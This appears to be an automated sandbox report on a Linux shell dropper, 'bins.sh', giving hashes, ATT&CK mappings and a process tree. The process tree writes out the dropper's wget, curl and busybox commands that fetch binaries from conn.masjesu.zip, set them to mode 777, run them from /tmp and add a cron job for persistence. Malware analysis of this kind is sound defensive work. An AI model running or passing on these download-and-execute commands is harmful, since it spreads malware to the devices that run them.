d3a14e7d020238cc0859f57fbd1f6cff0c17fed053c79fd637e0686ec4947b9a

Analysis

max time kernel
150s
max time network
162s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11/12/2024, 04:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

d5c47e004c5ac3cf521c680d4dad8b43
SHA1

56be34877677b2c08b6cc49ff01b95ce5e9648cf
SHA256

d3a14e7d020238cc0859f57fbd1f6cff0c17fed053c79fd637e0686ec4947b9a
SHA512

bc1052f504c227b1d8818f02cb1aaf88e72ad162444d5f676fef4b098a87d57643e77e46956f226a81434590139533bbb0f34610caa118c7fadacdf46202470f
SSDEEP

192:gSPhJKxx/8sUV7IF5wpxHyc+m6tMMHedto3T7y4nln8Q5Wdto3Tny4nln8Q5KsUJ:gS2Uac+m6tMMHty4nln8Q51y4nln8Q56

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2021) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
691	chmod
790	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D	693	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D

Renames itself 1 IoCs

pid	Process
694	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.xAJ30u	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/29/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/897/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1037/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/669/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/856/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/969/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/825/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/938/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1032/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/986/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1067/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/278/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/651/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/771/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/881/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1105/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/17/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/288/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/818/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1020/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/802/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/875/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/934/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/989/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1013/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/23/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/753/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/756/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1059/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1128/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/6/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1060/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/812/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/822/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/937/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/990/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1011/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/154/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/307/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/964/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1005/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1046/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/11/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/765/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/929/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1040/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1030/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/309/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/318/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/769/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/972/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/703/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/744/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/873/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1001/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1064/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/395/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/827/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/829/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/1066/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
File opened for reading	/proc/788/cmdline	VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D

System Network Configuration Discovery 1 TTPs 8 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
794	curl
668	wget
673	curl
689	busybox
705	wget
707	curl
788	busybox
793	wget

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:659
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:662
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
  2⤵
  - System Network Configuration Discovery
  PID:668
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:673
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
  2⤵
  - System Network Configuration Discovery
  PID:689
- /bin/chmod
  chmod 777 VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
  ./VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:693
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:695
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:696
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:698
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:699
- /bin/rm
  rm VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D
  2⤵
  PID:702
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QwzMHcpTShuCAQZWzQDPpUPGu9wgdYayXS
  2⤵
  - System Network Configuration Discovery
  PID:705
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QwzMHcpTShuCAQZWzQDPpUPGu9wgdYayXS
  2⤵
  - System Network Configuration Discovery
  PID:707
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QwzMHcpTShuCAQZWzQDPpUPGu9wgdYayXS
  2⤵
  - System Network Configuration Discovery
  PID:788
- /bin/chmod
  chmod 777 QwzMHcpTShuCAQZWzQDPpUPGu9wgdYayXS
  2⤵
  - File and Directory Permissions Modification
  PID:790
- /tmp/QwzMHcpTShuCAQZWzQDPpUPGu9wgdYayXS
  ./QwzMHcpTShuCAQZWzQDPpUPGu9wgdYayXS
  2⤵
  PID:791
- /bin/rm
  rm QwzMHcpTShuCAQZWzQDPpUPGu9wgdYayXS
  2⤵
  PID:792
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/bbiAPK9IwI4n0vx7Z3uf7dpI4VaVCjVigz
  2⤵
  - System Network Configuration Discovery
  PID:793
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/bbiAPK9IwI4n0vx7Z3uf7dpI4VaVCjVigz
  2⤵
  - System Network Configuration Discovery
  PID:794

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/VrY8Qm0vyBzBq3Wyw5UBdbBteGrcLZ6W3D

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.xAJ30u

Filesize
210B

MD5
81c2684d0ba9803dd08d15ae990a37b7

SHA1
ad6654dfa711315b77d65a1fb050f9fe7a9f4789

SHA256
a7b81dc4ff12512ba1f9e73585682bf67c118b0d12d994eac4b1f134fbe528c9

SHA512
ce40a7f14b037418c5302d07bad69a068a1b468d335d3110ffb864438068f527c600f973ef69313c7db3c85912689565451c1c9d21035d22cf5102b6078437cf

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads